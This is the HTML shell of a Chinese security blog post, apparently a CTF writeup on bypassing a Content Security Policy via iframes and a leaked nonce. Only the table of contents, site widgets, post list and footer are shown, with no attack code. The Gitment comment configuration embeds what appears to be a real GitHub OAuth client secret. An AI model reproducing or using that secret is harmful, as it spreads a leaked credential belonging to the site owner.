    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96ID"><span class="toc-number">1.</span> <span class="toc-text">获取ID</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E3%80%90%E9%9D%9E%E9%A2%84%E6%9C%9F%E3%80%91%E9%80%9A%E8%BF%87iframe%E6%8E%A7%E5%88%B6csp"><span class="toc-number">2.</span> <span class="toc-text">【非预期】通过iframe控制csp</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">2.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">2.2.</span> <span class="toc-text">利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E3%80%90%E9%A2%84%E6%9C%9F%E3%80%91%E6%8B%BF%E5%88%B0nonce%EF%BC%8C%E6%89%A7%E8%A1%8Cjs"><span class="toc-number">3.</span> <span class="toc-text">【预期】拿到nonce，执行js</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-number">3.1.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC"><span class="toc-number">3.2.</span> <span class="toc-text">脚本</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%80%E5%90%8E"><span class="toc-number">4.</span> <span class="toc-text">最后</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-number">5.</span> <span class="toc-text">参考资料</span></a></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="//cdn.bootcss.com/jquery/1.11.1/jquery.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";
    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>




<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='https://static.5am3.com/js/baidu/share.js?v=111.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <div id="gitments" style="width: 90%; margin: 0 auto;"></div>
<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
<script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>

<script>
    var gitment = new Gitment({
      id: window.location.pathname,
      owner: '5am3',
      repo: '5am3.github.io',
      oauth: {
        client_id: 'f9b6a0a70c093d4f4f91',
        client_secret: 'ddda0abc39ed79ab681585813d74b83e5e00256a',
      },
    })
    gitment.render('gitments')
</script> 
    



    <div class="scroll" id="post-nav-button">
        
            <a  href="/2018/07/04/GourdScan_V2/" title="上一篇: GourdScan V2 配置安全及使用">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a  href="/2018/05/04/web-testing-one/" title="下一篇: 记一次简单的渗透测试">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/02/11/ctf-node1/">近两次比赛遇到的node题目简析</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/19/ddctf2019/">2019DDCTF  writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/12/2018HCTF-share/">2018HCTF-share</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/07/23/MysqlOnline-writeup/">MysqlOnline writeup 巅峰极客</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/07/04/GourdScan_V2/">GourdScan V2 配置安全及使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/03/0ctf-final/">2018 0CTF final h4x0rs.date</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/04/web-testing-one/">记一次简单的渗透测试</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/04/24/ddctf2018/">2018DDCTF  writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/03/26/qwb-xss-rpo/">强网杯-Share your mind</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/25/anheng-2-xss/">2018安恒杯二月赛-web-应该不是 XSS</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/08/SCodeCTF/">通过docker部署ctf题目</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/20/2017LCTF-1/">2017LCTF wanna hack him? writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/09/360-interview/">360面试经历及心得</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/31/miac2-writeup/">2017-miac2-writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/02/xman-2/">【诺熙】XMAN训练营手记-2-密码</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/01/xman-1/">XMAN训练营手记-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/17/hexo2/">2.初识HEXO-页面配置</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/17/hexo1/">1.初识HEXO-文档排版</a></li></ul>
    
    <script src="https://cdn.bootcdn.net/ajax/libs/require.js/2.1.6/require.min.js"></script>
    <script src="https://cdn.bootcdn.net/ajax/libs/jquery/1.9.1/jquery.min.js"></script>

    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2024 丶诺熙
            </div>
            <div class="footer-right">
                <p>Power By <a href="http://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/maochunguang/black-blue" target="_blank">Themme by tommy</a></p>
            </div>
        </div>
        
            <div class="visit">
                <script src="https://s22.cnzz.com/z_stat.php?id=1267947142&web_id=1267947142" language="JavaScript"></script>
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>


    </div>
    
<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 4;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'xxxxx', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->



	<script>
	var _hmt = _hmt || [];
	(function() {
	  var hm = document.createElement("script");
	  hm.src = "//hm.baidu.com/hm.js?xxxxxx";
	  var s = document.getElementsByTagName("script")[0]; 
	  s.parentNode.insertBefore(hm, s);
	})();
	</script>



<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>


<script src="//cdn.bootcss.com/jquery/1.11.1/jquery.min.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>